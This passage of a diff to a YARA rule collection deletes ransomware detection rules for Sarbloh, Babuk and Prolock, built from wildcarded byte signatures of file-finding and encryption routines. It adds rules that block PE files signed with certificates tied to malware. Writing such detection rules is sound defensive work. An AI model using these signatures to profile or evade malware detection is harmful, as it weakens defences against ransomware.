-            54 24 ?? 52 8D 84 24 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 8D 8C 24 ?? ?? ?? ?? 51 8D 54 24
-            ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 8B F7 83 FF ?? 72 ?? BE ?? ?? ?? ?? 8B 4C 24 ?? 56 8D
-            44 24 ?? 50 51 E8 ?? ?? ?? ?? 01 74 24 ?? 2B FE 83 C4 ?? 43 89 BC 24 ?? ?? ?? ?? 85
-            FF 0F 85 ?? ?? ?? ?? 5F 5E 5D 5B 81 C4 ?? ?? ?? ?? C3
-      }
-		$find_files = {
-            83 EC ?? 53 55 56 57 33 DB 68 ?? ?? ?? ?? 6A ?? 89 5C 24 ?? 89 5C 24 ?? E8 ?? ?? ??
-            ?? 8B E8 8D 44 24 ?? 50 89 6C 24 ?? E8 ?? ?? ?? ?? 8D 4C 24 ?? 55 51 E8 ?? ?? ?? ??
-            8B 74 24 ?? 6A ?? 56 E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 56 E8 ?? ?? ?? ?? 55 68 ?? ?? ??
-            ?? 89 5C 24 ?? 89 5C 24 ?? E8 ?? ?? ?? ?? 8B F8 57 8D 54 24 ?? 52 8D 44 24 ?? 50 E8
-            ?? ?? ?? ?? 83 C4 ?? 89 44 24 ?? 3B C3 75 ?? 8B 4C 24 ?? 51 8D 54 24 ?? 52 E8 ?? ??
-            ?? ?? 83 C4 ?? 57 E8 ?? ?? ?? ?? 6A ?? 56 E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 56 E8 ?? ??
-            ?? ?? 8B 44 24 ?? 50 56 E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 56 E8 ?? ?? ?? ?? 8B 4C 24 ??
-            51 56 E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 56 E8 ?? ?? ?? ?? 8B 54 24 ?? 52 56 E8 ?? ?? ??
-            ?? 83 C4 ?? 33 FF 39 5C 24 ?? 76 ?? 8D 64 24 ?? 8B 44 24 ?? 8B 0C B8 51 56 E8 ?? ??
-            ?? ?? 47 83 C4 ?? 3B 7C 24 ?? 72 ?? 39 5C 24 ?? 75 ?? 8B 44 24 ?? 3B C3 74 ?? 50 E8
-            ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? 56 E8 ?? ?? ?? ?? 8B 54 24 ?? 52 56 E8 ?? ?? ??
-            ?? 8B 44 24 ?? 83 C4 ?? 89 5C 24 ?? 3B C3 0F 86 ?? ?? ?? ?? EB ?? 8D 9B ?? ?? ?? ??
-            8B 44 24 ?? 8B 4C 24 ?? 8B 1C 88 53 55 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B F8 57 68 ??
-            ?? ?? ?? E8 ?? ?? ?? ?? 57 68 ?? ?? ?? ?? 8B E8 E8 ?? ?? ?? ?? 6A ?? 56 89 44 24 ??
-            E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 56 E8 ?? ?? ?? ?? 53 56 E8 ?? ?? ?? ?? 68 ?? ?? ?? ??
-            56 E8 ?? ?? ?? ?? 33 C0 8D 54 24 ?? 55 52 C7 44 24 ?? ?? ?? ?? ?? 89 44 24 ?? 89 84
-            24 ?? ?? ?? ?? 89 84 24 ?? ?? ?? ?? 89 84 24 ?? ?? ?? ?? 89 84 24 ?? ?? ?? ?? 89 84
-            24 ?? ?? ?? ?? 89 84 24 ?? ?? ?? ?? 89 84 24 ?? ?? ?? ?? 89 84 24 ?? ?? ?? ?? E8 ??
-            ?? ?? ?? 83 C4 ?? 85 C0 74 ?? 50 56 E8 ?? ?? ?? ?? 83 C4 ?? EB ?? 8D 44 24 ?? 50 56
-            E8 ?? ?? ?? ?? 8D 4C 24 ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? 56 E8 ?? ?? ??
-            ?? 8B 5C 24 ?? E8 ?? ?? ?? ?? 57 E8 ?? ?? ?? ?? 55 E8 ?? ?? ?? ?? 8B D3 52 E8 ?? ??
-            ?? ?? 8B 4C 24 ?? 8B 44 24 ?? 8B 6C 24 ?? 41 83 C4 ?? 89 4C 24 ?? 3B C8 0F 82 ?? ??
-            ?? ?? 33 DB 33 F6 3B C3 76 ?? 8B 44 24 ?? 8B 0C B0 51 E8 ?? ?? ?? ?? 46 83 C4 ?? 3B
-            74 24 ?? 72 ?? 8D 54 24 ?? 52 E8 ?? ?? ?? ?? 55 E8 ?? ?? ?? ?? 8B 44 24 ?? 83 C4 ??
-            3B C3 74 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8B 44 24 ?? 5F 5E 5D 3B C3 5B 74 ?? 50 E8 ??
-            ?? ?? ?? 83 C4 ?? 83 C4 ?? C3
-      }
-
 	condition:
-		uint16( 0 ) == 0x5A4D and $scan_for_services and $find_files and $encrypt_files and $remote_connection
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Open Source Developer, Song WU" and pe.signatures [ i ] . serial == "35:96:df:c2:3b:9a:42:c6:67:00:98:22:50:da:29:06" and 1397219344 <= pe.signatures [ i ] . not_after )
 }
-rule REVERSINGLABS_Win32_Ransomware_Sarbloh : TC_DETECTION MALICIOUS MALWARE FILE
+
+rule REVERSINGLABS_Cert_Blocklist_486Bbddc8C5Ee99F051Ecaeb3F99D2A3 : INFO FILE
 {
 	meta:
-		description = "Yara rule that detects Sarbloh ransomware."
+		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "532abd77-f091-5c54-87a3-7e8be5253efd"
-		date = "2021-05-21"
-		modified = "2021-05-21"
+		id = "07b43dd7-e8f1-5b14-a0f4-42294b5b597e"
+		date = "2020-08-05"
+		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/ransomware/Win32.Ransomware.Sarbloh.yara#L1-L88"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L17016-L17032"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "7259aa9d1fe657db220ee50f1610e6439ff61673d92f46ebc3b8cadd990f002c"
+		logic_hash = "75855e26ba4e01b56a551a006e789c6032cfb02c6f6125a9bdf8becb848db5b2"
 		score = 75
 		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
+		tags = "INFO, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Ransomware"
-		tc_detection_name = "Sarbloh"
-		tc_detection_factor = 5
+		category = "INFO"
 		importance = 25
 
-	strings:
-		$encrypt_files_p1 = {
-            8B 45 ?? C6 00 ?? 8B 45 ?? 40 89 45 ?? 39 75 ?? 72 ?? 6A ?? 8D 45 ?? C7 45 ?? ?? ??
-            ?? ?? 50 6A ?? 6A ?? 6A ?? 6A ?? 52 FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 8B 75
-            ?? 81 FE ?? ?? ?? ?? 0F 82 ?? ?? ?? ?? 56 6A ?? FF 15 ?? ?? ?? ?? 50 FF 15 ?? ?? ??
-            ?? 8B D8 89 5D ?? 85 DB 0F 84 ?? ?? ?? ?? C1 E6 ?? 56 6A ?? 89 75 ?? FF 15 ?? ?? ??
-            ?? 50 FF 15 ?? ?? ?? ?? 89 45 ?? 85 C0 0F 84 ?? ?? ?? ?? 8B 7D ?? 8D 85 ?? ?? ?? ??
-            6A ?? 6A ?? 50 8D 85 ?? ?? ?? ?? 50 57 FF 15 ?? ?? ?? ?? 85 C0 0F 88 ?? ?? ?? ?? 8B
-            8D ?? ?? ?? ?? 8B C1 8B 55 ?? 0B C2 89 4D ?? 89 55 ?? 0F 84 ?? ?? ?? ?? 0F 57 C0 66
-            0F 13 45 ?? 85 D2 0F 8C ?? ?? ?? ?? 7F ?? 85 C9 0F 84 ?? ?? ?? ?? 8B 45 ?? 89 45 ??
-            8B 45 ?? 89 45 ?? EB ?? 8B 75 ?? 8B 7D ?? 6A ?? 6A ?? 8D 45 ?? 50 8D 85 ?? ?? ?? ??
-            50 57 FF 15 ?? ?? ?? ?? 85 C0 0F 88 ?? ?? ?? ?? 8B 45 ?? 8B 4D ?? 89 4D ?? 89 45 ??
-            85 C0 0F 8C ?? ?? ?? ?? 7F ?? 85 C9 0F 82 ?? ?? ?? ?? 6A ?? 6A ?? 8D 45 ?? 50 8D 85
-            ?? ?? ?? ?? 50 57 FF 15 ?? ?? ?? ?? 85 C0 0F 88 ?? ?? ?? ?? 6A ?? 6A ?? 56 8B 75 ??
-            8D 45 ?? 56 50 6A ?? 6A ?? 6A ?? 57 FF 15 ?? ?? ?? ?? 3D ?? ?? ?? ?? 74 ?? 85 C0 0F
-            85 ?? ?? ?? ?? 8B 75 ?? EB ?? 33 F6 8B 45 ?? 8B 4D ?? 89 75 ?? 89 4D ?? 89 45 ?? 85
-            C0 0F 8C ?? ?? ?? ?? 7F ?? 85 C9 0F 82 ?? ?? ?? ?? 6A ?? 6A ?? 8D 45 ?? 50 8D 85 ??
-            ?? ?? ?? 50 57 FF 15 ?? ?? ?? ?? 33 FF 85 C0 0F 88 ?? ?? ?? ?? 85 F6 0F 84
-        }
-		$encrypt_files_p2 = {
-            8B 75 ?? 8D 45 ?? 56 50 53 52 6A ?? 52 FF 75 ?? C7 45 ?? ?? ?? ?? ?? FF 15 ?? ?? ??
-            ?? 85 C0 0F 84 ?? ?? ?? ?? 6A ?? 6A ?? 56 53 8D 45 ?? 50 6A ?? 6A ?? 6A ?? FF 75 ??
-            FF 15 ?? ?? ?? ?? 3D ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 85 C0 0F 88 ?? ?? ?? ?? 8B 4D ??
-            81 C7 ?? ?? ?? ?? 3B 7D ?? 72 ?? 8B 75 ?? 03 75 ?? 8B 45 ?? 83 D0 ?? 89 75 ?? 89 45
-            ?? 3B 45 ?? 0F 8C ?? ?? ?? ?? 7F ?? 3B B5 ?? ?? ?? ?? 8B 75 ?? 0F 82 ?? ?? ?? ?? 8D
-            45 ?? 50 6A ?? 6A ?? 6A ?? 6A ?? FF 75 ?? FF 15 ?? ?? ?? ?? F7 D8 6A ?? 1B DB 8D 45
-            ?? 23 5D ?? 50 6A ?? 6A ?? 6A ?? 6A ?? FF 75 ?? 89 5D ?? 89 5D ?? FF 15 ?? ?? ?? ??
-            F7 D8 1B F6 23 75 ?? 56 6A ?? 89 75 ?? FF 15 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 8B F8
-            85 FF 0F 84 ?? ?? ?? ?? 8D 45 ?? 89 5D ?? 50 57 6A ?? 6A ?? 6A ?? FF 75 ?? FF 15 ??
-            ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 56 8D 45 ?? 89 5D ?? 50 57 6A ?? 6A ?? 6A ?? FF 75
-            ?? FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 6A ?? 6A ?? 56 57 8D 45 ?? 50 6A ?? 6A
-            ?? 6A ?? FF 75 ?? FF 15 ?? ?? ?? ?? 3D ?? ?? ?? ?? 74 ?? 85 C0 78 ?? 39 75 ?? 75 ??
-            8B 85 ?? ?? ?? ?? 6A ?? 6A ?? 89 85 ?? ?? ?? ?? 8B 45 ?? 6A ?? 89 85 ?? ?? ?? ?? 8D
-            85 ?? ?? ?? ?? 50 8D 45 ?? 89 9D ?? ?? ?? ?? 50 6A ?? 6A ?? 6A ?? FF 75 ?? 89 B5 ??
-            ?? ?? ?? FF 15 ?? ?? ?? ?? 3D ?? ?? ?? ?? 74 ?? 85 C0 78 ?? 33 C0 B9 ?? ?? ?? ?? 83
-            7D ?? ?? 0F 44 C1 89 45 ?? 89 7D ?? 83 7D ?? ?? 74 ?? 8B 4D ?? 03 4D ?? 39 4D ?? 73
-            ?? 90 8B 45 ?? C6 00 ?? 8B 45 ?? 40 89 45 ?? 39 4D ?? 72 ?? 57 6A ?? FF 15 ?? ?? ??
-            ?? 50 FF 15 ?? ?? ?? ?? 8B 5D ?? 8B 7D ?? 8B 75 ?? EB
-        }
-		$find_files_p1 = {
-            55 8B EC 83 EC ?? 53 56 8B 75 ?? 57 8B F9 83 3E ?? 0F 84 ?? ?? ?? ?? 6A ?? 6A ?? 8D
-            45 ?? 50 52 FF 15 ?? ?? ?? ?? 6A ?? 8D 45 ?? C7 45 ?? ?? ?? ?? ?? 6A ?? 89 45 ?? 8D
-            45 ?? 50 8D 45 ?? C7 45 ?? ?? ?? ?? ?? 50 68 ?? ?? ?? ?? 57 C7 45 ?? ?? ?? ?? ?? C7
-            45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8B 0F 89 4D ?? 85 C0 78 ??
-            83 F9 ?? 74 ?? FF 75 ?? BB ?? ?? ?? ?? C7 06 ?? ?? ?? ?? 6A ?? FF 15 ?? ?? ?? ?? 50
-            FF 15 ?? ?? ?? ?? 8B 55 ?? EB ?? FF 75 ?? C7 06 ?? ?? ?? ?? 6A ?? FF 15 ?? ?? ?? ??
-            50 FF 15 ?? ?? ?? ?? B8 ?? ?? ?? ?? 5F 5E 5B 8B E5 5D C3 8B 17 33 DB 89 55 ?? C7 45
-            ?? ?? ?? ?? ?? 83 7D ?? ?? 74 ?? 8B 4D ?? 81 C1 ?? ?? ?? ?? 39 4D ?? 73
-        }
-		$find_files_p2 = {
-            8B 45 ?? C6 00 ?? 8B 45 ?? 40 89 45 ?? 39 4D ?? 72 ?? 53 6A ?? 6A ?? 6A ?? 68 ?? ??
-            ?? ?? 68 ?? ?? ?? ?? 8D 45 ?? 50 6A ?? 6A ?? 6A ?? 52 FF 15 ?? ?? ?? ?? 8B F8 33 DB
-            89 5D ?? 81 FF ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 8B 55 ?? 85 FF 78 ?? 8B 4D ?? 8B 35 ??
-            ?? ?? ?? 2B CB 0F 84 ?? ?? ?? ?? 83 E9 ?? 0F 85 ?? ?? ?? ?? 8B 0D ?? ?? ?? ?? 8B C1
-            C1 E8 ?? F7 D0 A8 ?? 74 ?? F7 C1 ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 83 FE ?? 74 ?? 83 FE
-            ?? 0F 85 ?? ?? ?? ?? B9 ?? ?? ?? ?? 33 C0
-        }
-
 	condition:
-		uint16( 0 ) == 0x5A4D and ( all of ( $find_files_p* ) ) and ( all of ( $encrypt_files_p* ) )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Xin Zhou" and pe.signatures [ i ] . serial == "48:6b:bd:dc:8c:5e:e9:9f:05:1e:ca:eb:3f:99:d2:a3" and 1473292800 <= pe.signatures [ i ] . not_after )
 }
-rule REVERSINGLABS_Win32_Ransomware_Babuk : TC_DETECTION MALICIOUS MALWARE FILE
+
+rule REVERSINGLABS_Cert_Blocklist_11211Eea9D0D1D1A325B5Eae1B2B1951120F : INFO FILE
 {
 	meta:
-		description = "Yara rule that detects Babuk ransomware."
+		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "8a96f400-193f-5fd1-ba03-4da464345e1c"
-		date = "2021-01-26"
-		modified = "2021-01-26"
+		id = "09b8b3f3-a4aa-5584-b8d0-751cc87267bf"
+		date = "2020-08-05"
+		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/ransomware/Win32.Ransomware.Babuk.yara#L1-L117"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L17034-L17050"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "70327b3f9d0b0505ade7ee6de6d7facf56820c7e8477bd172f738f374311144f"
+		logic_hash = "bafab986605be61d25a6764042937bc5d8c55196ea8ea9aa9360764d9681351b"
 		score = 75
 		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
+		tags = "INFO, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Ransomware"
-		tc_detection_name = "Babuk"
-		tc_detection_factor = 5
+		category = "INFO"
 		importance = 25
 
-	strings:
-		$find_files = {
-            55 8B EC 81 EC ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C5 89 45 ?? 68 ?? ?? ?? ?? E8 ?? ?? ??
-            ?? 83 C4 ?? 89 85 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 8B 45 ?? 50 8B
-            8D ?? ?? ?? ?? 51 FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 52 FF 15 ?? ??
-            ?? ?? 8D 85 ?? ?? ?? ?? 50 8B 8D ?? ?? ?? ?? 51 FF 15 ?? ?? ?? ?? 89 85 ?? ?? ?? ??
-            83 BD ?? ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? EB ?? 8B 95 ??
-            ?? ?? ?? 83 C2 ?? 89 95 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 73 ?? 8B 85 ?? ?? ?? ?? 8B
-            0C 85 ?? ?? ?? ?? 51 8D 95 ?? ?? ?? ?? 52 FF 15 ?? ?? ?? ?? 85 C0 75 ?? E9 ?? ?? ??
-            ?? E9 ?? ?? ?? ?? EB ?? 8B 45 ?? 50 8B 8D ?? ?? ?? ?? 51 FF 15 ?? ?? ?? ?? 68 ?? ??
-            ?? ?? 8B 95 ?? ?? ?? ?? 52 FF 15 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 8B 8D ?? ?? ?? ??
-            51 FF 15 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 83 E2 ?? 74 ?? 83 7D ?? ?? 77 ?? 8B 45 ?? 83
-            C0 ?? 50 8B 8D ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? E9 ?? ?? ?? ?? 68 ?? ?? ?? ??
-            8D 95 ?? ?? ?? ?? 52 FF 15 ?? ?? ?? ?? 85 C0 74 ?? 8D 85 ?? ?? ?? ?? 50 FF 15 ?? ??
-            ?? ?? 89 85 ?? ?? ?? ?? EB ?? 8B 8D ?? ?? ?? ?? 83 E9 ?? 89 8D ?? ?? ?? ?? 83 BD ??
-            ?? ?? ?? ?? 7C ?? 8B 95 ?? ?? ?? ?? 0F B7 84 55 ?? ?? ?? ?? 83 F8 ?? 75 ?? 68 ?? ??
-            ?? ?? 8B 8D ?? ?? ?? ?? 8D 94 4D ?? ?? ?? ?? 52 FF 15 ?? ?? ?? ?? 85 C0 75 ?? EB ??
-            EB ?? EB ?? EB ?? EB ?? 8B 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 8D ?? ?? ??
-            ?? 51 8B 95 ?? ?? ?? ?? 52 FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 8B 85 ?? ?? ??
-            ?? 50 FF 15
-        }
-		$encrypt_files_p1 = {
-            55 8B EC B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C5 89 45 ?? C7 85 ?? ?? ??
-            ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? 8B 45 ?? 50 FF 15 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 6A
-            ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 8B 4D ?? 51 FF 15 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 83 BD
-            ?? ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 52 8B 85 ?? ?? ?? ?? 50 FF 15 ??
-            ?? ?? ?? 6A ?? 6A ?? 6A ?? 6A ?? 6A ?? 8B 8D ?? ?? ?? ?? 51 FF 15 ?? ?? ?? ?? 89 85
-            ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 0F 8C ?? ??
-            ?? ?? 7F ?? 81 BD ?? ?? ?? ?? ?? ?? ?? ?? 0F 86 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 8B
-            95 ?? ?? ?? ?? 52 8B 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 6A ?? 6A ?? 52 50 E8 ?? ?? ??
-            ?? 89 85 ?? ?? ?? ?? 89 95 ?? ?? ?? ?? 0F 57 C0 66 0F 13 85 ?? ?? ?? ?? EB ?? 8B 8D
-            ?? ?? ?? ?? 83 C1 ?? 8B 95 ?? ?? ?? ?? 83 D2 ?? 89 8D ?? ?? ?? ?? 89 95 ?? ?? ?? ??
-            83 BD ?? ?? ?? ?? ?? 0F 8F ?? ?? ?? ?? 7C ?? 83 BD ?? ?? ?? ?? ?? 0F 83 ?? ?? ?? ??
-            8B 85 ?? ?? ?? ?? 50 8B 8D ?? ?? ?? ?? 51 8B 95 ?? ?? ?? ?? 52 8B 85 ?? ?? ?? ?? 50
-        }
-		$encrypt_files_p2 = {
-            E8 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 52 50 E8 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 89 95 ??
-            ?? ?? ?? 68 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 51 8B 95 ?? ?? ?? ?? 52 68 ?? ?? ?? ?? 8B
-            85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 74 ?? 68
-            ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 51 8B 95 ?? ?? ?? ?? 52 68 ?? ?? ?? ?? 6A ?? 68 ?? ??
-            ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 50 8B 8D ?? ?? ?? ??
-            51 68 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 8B 95 ?? ?? ?? ?? 52
-            FF 15 ?? ?? ?? ?? E9 ?? ?? ?? ?? E9 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 0F 8C ?? ?? ??
-            ?? 7F ?? 83 BD ?? ?? ?? ?? ?? 0F 86 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 50 6A ?? 6A ?? 68
-            ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 51 FF 15 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 83 BD ?? ?? ??
-            ?? ?? 74 ?? 8B 95 ?? ?? ?? ?? 52 8B 85 ?? ?? ?? ?? 50 8B 8D ?? ?? ?? ?? 51 68 ?? ??
-            ?? ?? 6A ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 8B 95 ?? ?? ?? ?? 52 8B 85 ?? ??
-            ?? ?? 50 8B 8D ?? ?? ?? ?? 51 68 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83
-        }
-		$encrypt_files_p3 = {
-            C4 ?? 8B 95 ?? ?? ?? ?? 52 FF 15 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ??
-            8B 8D ?? ?? ?? ?? 51 FF 15 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 52 FF 15 ?? ?? ?? ?? 68 ??
-            ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 89 85 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 74 ?? 8B 45
-            ?? 50 8B 8D ?? ?? ?? ?? 51 FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 52 FF
-            15 ?? ?? ?? ?? 6A ?? 8B 85 ?? ?? ?? ?? 50 8B 4D ?? 51 FF 15 ?? ?? ?? ?? 8B 95 ?? ??
-            ?? ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? E9 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 0F 84 ?? ?? ??
-            ?? 6A ?? 6A ?? 8D 45 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 4D ?? 51 6A ?? 8D 95 ?? ?? ??
-            ?? 52 E8 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 6A ?? 8D 45 ?? 50 6A
-            ?? 8B 8D ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ??
-            ?? ?? ?? 8D 95 ?? ?? ?? ?? 52 8D 85 ?? ?? ?? ?? 50 8D 8D ?? ?? ?? ?? 51 8D 95 ?? ??
-            ?? ?? 52 8B 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? C7 85 ?? ?? ??
-            ?? ?? ?? ?? ?? EB ?? 8B 8D ?? ?? ?? ?? 83 C1 ?? 89 8D ?? ?? ?? ?? 8B 95 ?? ?? ?? ??
-            3B 95 ?? ?? ?? ?? 0F 83 ?? ?? ?? ?? 69 85 ?? ?? ?? ?? ?? ?? ?? ?? 83 BC 05 ?? ?? ??
-            ?? ?? 0F 84 ?? ?? ?? ?? 69 8D ?? ?? ?? ?? ?? ?? ?? ?? 81 BC 0D ?? ?? ?? ?? ?? ?? ??
-            ?? 74 ?? FF 15 ?? ?? ?? ?? 69 95 ?? ?? ?? ?? ?? ?? ?? ?? 3B 84 15 ?? ?? ?? ?? 74 ??
-            69 85 ?? ?? ?? ?? ?? ?? ?? ?? 8B 8C 05 ?? ?? ?? ?? 51 6A ?? 68 ?? ?? ?? ?? FF 15 ??
-            ?? ?? ?? 89 85 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 74 ?? 6A ?? 8B 95 ?? ?? ?? ?? 52 FF
-            15 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 8B 8D ?? ?? ??
-            ?? 51 FF 15 ?? ?? ?? ?? E9 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? C7 85 ??
-            ?? ?? ?? ?? ?? ?? ?? E9 ?? ?? ?? ?? 8B 4D ?? 33 CD E8 ?? ?? ?? ?? 8B E5 5D C3
-        }
-		$enum_resources = {
-            55 8B EC 83 EC ?? A1 ?? ?? ?? ?? 33 C5 89 45 ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ??
-            ?? ?? 8D 45 ?? 50 8B 4D ?? 51 6A ?? 6A ?? 6A ?? E8 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ??
-            ?? 8B 55 ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 89 45 ?? 83 7D ?? ?? 0F 84 ?? ?? ?? ?? 8D 45
-            ?? 50 8B 4D ?? 51 8D 55 ?? 52 8B 45 ?? 50 E8 ?? ?? ?? ?? 85 C0 75 ?? C7 45 ?? ?? ??
-            ?? ?? EB ?? 8B 4D ?? 83 C1 ?? 89 4D ?? 8B 55 ?? 3B 55 ?? 73 ?? 8B 45 ?? C1 E0 ?? 8B
-            4D ?? 8B 54 01 ?? 83 E2 ?? 74 ?? 8B 45 ?? C1 E0 ?? 03 45 ?? 50 E8 ?? ?? ?? ?? 83 C4
-            ?? EB ?? 6A ?? 8B 4D ?? C1 E1 ?? 8B 55 ?? 8B 44 0A ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? EB
-            ?? EB ?? 8B 4D ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 8B 55 ?? 52 E8 ?? ?? ?? ?? 8B 4D ?? 33
-            CD E8 ?? ?? ?? ?? 8B E5 5D C3
-        }
-
 	condition:
-		uint16( 0 ) == 0x5A4D and ( $find_files ) and ( all of ( $encrypt_files_p* ) ) and ( $enum_resources )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "LLC HERMES" and pe.signatures [ i ] . serial == "11:21:1e:ea:9d:0d:1d:1a:32:5b:5e:ae:1b:2b:19:51:12:0f" and 1460147212 <= pe.signatures [ i ] . not_after )
 }
-/*
- * YARA Rule Set
- * Repository Name: R3c0nst
- * Repository: https://github.com/fboldewin/YARA-rules/
- * Retrieval Date: 2026-02-22
- * Git Commit: 54e9e6899b258b72074b2b4db6909257683240c2
- * Number of Rules: 26
- * Skipped: 0 (age), 0 (quality), 0 (score), 0 (importance)
- *
- *
- * LICENSE
- *
- * NO LICENSE SET
- */
-rule R3C0NST_Prolock_Malware : FILE
+
+rule REVERSINGLABS_Cert_Blocklist_172Fea8Cb06Ffced6Bfac7F2F6B77754 : INFO FILE
 {
 	meta:
-		description = "Detects Prolock malware in encrypted and decrypted mode"
-		author = "Frank Boldewin (@r3c0nst)"
-		id = "1440b5f5-f1e7-522e-8852-84c326858bb9"
-		date = "2020-05-17"
-		modified = "2020-05-20"
-		reference = "https://raw.githubusercontent.com/fboldewin/YARA-rules/master/Prolock.Malware.yar"
